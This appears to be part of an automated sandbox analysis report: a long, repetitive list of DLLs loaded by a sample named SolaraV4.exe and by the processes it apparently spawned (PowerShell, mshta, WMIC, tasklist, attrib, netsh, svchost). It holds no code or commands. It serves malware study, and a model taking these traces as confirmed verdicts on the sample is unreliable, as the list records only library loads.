Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: msvfw32.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: dciman32.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: winmmbase.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: mmdevapi.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: devobj.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: ksuser.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: avrt.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: audioses.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: msacm32.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: midimap.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe Section loaded: textshaping.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tree.com Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
